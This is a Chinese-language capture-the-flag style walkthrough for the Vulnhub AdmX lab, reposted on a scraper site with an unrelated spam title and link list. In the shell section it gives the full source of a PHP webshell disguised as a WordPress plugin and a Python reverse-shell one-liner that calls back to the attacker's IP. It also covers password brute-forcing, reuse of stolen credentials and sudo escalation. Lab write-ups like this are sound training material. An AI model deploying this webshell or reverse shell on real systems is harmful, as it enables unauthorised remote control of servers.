当前位置: 首页 > news >正文

wordpress 肝病医院seo网络推广师招聘

wordpress 肝病医院,seo网络推广师招聘,做公司网站教程视频,网站建设g0x00前言 因为环境问题,此次靶场都放在vm上。都为NAT模式。 靶机地址: https://download.vulnhub.com/admx/AdmX_new.7z 需要找到两个flag文件。 0x01信息搜集 搜集IP 确认目标IP为172.16.8.131,进一步信息搜集 获取端口开放情况,版本信…

0x00前言

因为环境问题,此次靶场都放在vm上。都为NAT模式。

靶机地址: https://download.vulnhub.com/admx/AdmX_new.7z

需要找到两个flag文件。

0x01信息搜集

搜集IP

确认目标IP为172.16.8.131,进一步信息搜集

获取端口开放情况,版本信息等等。

 发现目标有80 端口开启。可以去看看。

发现没有什么功能点,然后直接目录扫描。

发现关键词WP 去查看。发现新页面

点击标签发现会自动跳转,一个网址,通过查看数据包代码里已经把IP地址写死了。但是可以利用BP来将响应包的数据替换掉。

0x02响应包替换。

添加两条规则即可。

替换后,(在浏览器上使用插件要把本地的规则放开,让BP能抓住本地网络的数据包)

看了一圈没有什么可疑的地方,继续信息搜集。 

发现admin路径,

经过测试发现。输入admin和输入其他是不一样的所以由此判断。用户名为admin.

直接爆破密码即可。adam14

0x03反弹shell

成功进入后台。

通过上网搜集资料发现 可以通过插件,主题,media等功能点上传木马来进行getshell.

在插件编辑功能点发现了php代码但是不能保存。

上传的文件必须是zip文件还得要符合规则

<?php
/**
* Plugin Name: Shell
* Plugin URI: https://x.github.io
* Description: WP Webshell for Pentest
* Version: 1.0
* Author: kalpa
* Author URI: https://x.github.io
* License: https://x.github.io
*/if(isset($_GET['cmd']))
{system($_GET['cmd']);
}
?>

把上面的文件写入php文件,打包成zip上传即可。

 然后把插件激活即可。

http://172.16.8.131/wordpress/wp-content/plugins/shell.php?cmd=whoami

访问上面的命令即可命令执行。

 然后尝试反弹shell.本次使用python反弹shell.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.8.132",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

反弹成功。

0x04提权

信息搜集,尝试提权。

进入/etc/passwd 查看 

发现一个wpadmin用户。去用户目录查看 

发现需要wpadmin 有一个txt可能是flag文件。尝试以wpadmin登陆

在wp的配置文件中找到了。如下信息。 

尝试连接数据库。 无果。

最后使用登陆 wordpress的密码成功登陆 wpadmin.

 0x05二次提权。

尝试把权限提升到root.

sudo提权 使用之前获取到的数据库密码尝试提权。 

 进过测试发现可以直接使用系统命令。

0x06 拿到第二个flag

 0x07总结

靶场用到的一些技术点:BP替换响应包,wordpress框架的测试,sudo提权。

http://www.yayakq.cn/news/20353/

相关文章:

  • 上海市安全建设监理协会网站图片类网站开发需求
  • 区块链开发与应用网站seo优化技能
  • 中国建设银行广西分行网站首页深圳华强北有什么好玩的
  • 网站建设需要哪些基础设计之家图片欣赏
  • 郑州做网站比较专业的机构计算机网站开发是什么专业
  • 培训网网站源码网站建设进展推进表
  • 母婴网站 模板教做月嫂的网站有吗
  • 石家庄站到石家庄北站在百度上打广告找谁
  • 商机互联公司做网站怎么样网站建设公司上海
  • 国外著名的网站设计公司国内免费工厂网站建设
  • 英文网站定制公司电子商务公司网站怎么建
  • 如何制作自己的公司内部网站定制西服大概多少钱一套
  • 免费商用图片的网站wordpress2018版本
  • 百度手机网站自助建站电商网站做导购
  • 上海网站建设公司有多少家网站价值评估怎么做
  • 山东青岛网站建设公司排名做图海报网站
  • 能在家做的兼职的网站建网站选服务器
  • 宝塔面板做织梦网站做网站界面的软件
  • 企业网站建设源码HTML最新新闻热点及观点
  • 自己做网站大概多少钱东莞网页设计制作公司
  • 支付宝网站登录入口电子商务网站开发背景及意义
  • 新浪博客怎么给自己网站做链接吗电子商务企业网站的建设
  • 苏省住房和城乡建设厅网站首页server2008 做网站
  • 做电影资讯网站算侵权吗网页布局设计说明
  • 公司网站开发找哪家网站自助建站软件
  • 咖啡厅网站开发目标炒域名 网站
  • 商业网站建设案例课程 下载网站不在首页显示出来
  • 重庆网站运营公司做混剪素材下载网站
  • wordpress渐隐渐现页面过渡效果搜索引擎推广seo
  • 江苏省公路与水路建设网站横沥镇网站建设公司